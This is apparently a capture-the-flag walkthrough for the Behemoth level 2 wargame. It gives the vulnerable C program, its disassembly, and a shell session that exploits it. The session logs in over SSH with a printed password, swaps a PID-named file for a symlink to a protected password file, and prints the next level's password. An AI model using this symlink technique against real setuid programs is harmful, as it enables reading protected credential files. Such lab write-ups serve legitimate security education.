#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
int main(int argc, char *argv[])
{
struct stat filestat;
char cmd[16];
char *ptrpid = cmd + 6;
pid_t pid;
pid = getpid();
sprintf(cmd, "touch %d", pid);
if (lstat(ptrpid, &filestat) & 0xf000 != 0x8000) {
unlink(ptrpid);
system(cmd);
}
sleep(2000);
*(int *)cmd = 0x20746163; /* "cat " */
cmd[5] = '\0';
cmd[5] = ' ';
system(cmd);
return 0;
}
栈环境
root@today:~# ssh behemoth2@178.79.134.250
behemoth2@178.79.134.250's password: eimahquuof
behemoth2@melinda:~$ cd /tmp/shui2
behemoth2@melinda:/tmp/shui2$ ls
behemoth2@melinda:/tmp/shui2$ /behemoth/behemoth2 > passs.txt &
[1] 32634
behemoth2@melinda:/tmp/shui2$ ls
32634 passs.txt
behemoth2@melinda:/tmp/shui2$ rm -f 32634
behemoth2@melinda:/tmp/shui2$ ln -sf /etc/behemoth_pass/behemoth3 32634
behemoth2@melinda:/tmp/shui2$ ll
total 1692
drwxrwxr-x 2 behemoth2 behemoth2 4096 Feb 18 04:52 ./
drwxrwx-wt 9354 root root 1724416 Feb 18 04:52 ../
lrwxrwxrwx 1 behemoth2 behemoth2 28 Feb 18 04:52 32634 -> /etc/behemoth_pass/behemoth3
-rw-rw-r-- 1 behemoth2 behemoth2 0 Feb 18 04:51 passs.txt
behemoth2@melinda:/tmp/shui2$ ./sleep.sh
...
sleep 2409 sec.
sleep 2410 sec.
sleep 2411 sec.
^C
[1]+ Done /behemoth/behemoth2 > passs.txt
behemoth2@melinda:/tmp/shui2$ ls
32634 passs.txt sleep.sh
behemoth2@melinda:/tmp/shui2$ cat passs.txt
nieteidiel
┌─────────────────────────────────────────────────────────────────────────────────┐
│0x804856d <main> push %ebp │
│0x804856e <main+1> mov %esp,%ebp │
│0x8048570 <main+3> and $0xfffffff0,%esp │
│0x8048573 <main+6> sub $0xa0,%esp │
│0x8048579 <main+12> mov %gs:0x14,%eax │
│0x804857f <main+18> mov %eax,0x9c(%esp) │
│0x8048586 <main+25> xor %eax,%eax │
│0x8048588 <main+27> call 0x8048410 <getpid@plt> │
│0x804858d <main+32> mov %eax,0x1c(%esp) │
│0x8048591 <main+36> lea 0x24(%esp),%eax │
│0x8048595 <main+40> add $0x6,%eax │
│0x8048598 <main+43> mov %eax,0x20(%esp) │
│0x804859c <main+47> mov 0x1c(%esp),%eax │
│0x80485a0 <main+51> mov %eax,0x8(%esp) │
│0x80485a4 <main+55> movl $0x804870c,0x4(%esp) │
│0x80485ac <main+63> lea 0x24(%esp),%eax │
│0x80485b0 <main+67> mov %eax,(%esp) │
│0x80485b3 <main+70> call 0x8048450 <sprintf@plt> │
│0x80485b8 <main+75> lea 0x38(%esp),%eax │
│0x80485bc <main+79> mov %eax,0x4(%esp) │
│0x80485c0 <main+83> mov 0x20(%esp),%eax │
│0x80485c4 <main+87> mov %eax,(%esp) │
│0x80485c7 <main+90> call 0x80486c0 <lstat> │
│0x80485cc <main+95> and $0xf000,%eax │
│0x80485d1 <main+100> cmp $0x8000,%eax │
│0x80485d6 <main+105> je 0x80485f0 <main+131> │
│0x80485d8 <main+107> mov 0x20(%esp),%eax │
│0x80485dc <main+111> mov %eax,(%esp) │
│0x80485df <main+114> call 0x8048400 <unlink@plt> │
│0x80485e4 <main+119> lea 0x24(%esp),%eax │
│0x80485e8 <main+123> mov %eax,(%esp) │
│0x80485eb <main+126> call 0x8048420 <system@plt> │
│0x80485f0 <main+131> movl $0x7d0,(%esp) │
│0x80485f7 <main+138> call 0x80483e0 <sleep@plt> │
│0x80485fc <main+143> lea 0x24(%esp),%eax │
│0x8048600 <main+147> movl $0x20746163,(%eax) │
│0x8048606 <main+153> movb $0x0,0x4(%eax) │
│0x804860a <main+157> movb $0x20,0x28(%esp) │
│0x804860f <main+162> lea 0x24(%esp),%eax │
│0x8048613 <main+166> mov %eax,(%esp) │
│0x8048616 <main+169> call 0x8048420 <system@plt> │
│0x804861b <main+174> mov $0x0,%eax │
│0x8048620 <main+179> mov 0x9c(%esp),%edx │
│0x8048627 <main+186> xor %gs:0x14,%edx │
│0x804862e <main+193> je 0x8048635 <main+200> │
│0x8048630 <main+195> call 0x80483f0 <__stack_chk_fail@plt> │
│0x8048635 <main+200> leave │
│0x8048636 <main+201> ret │
└─────────────────────────────────────────────────────────────────────────────────┘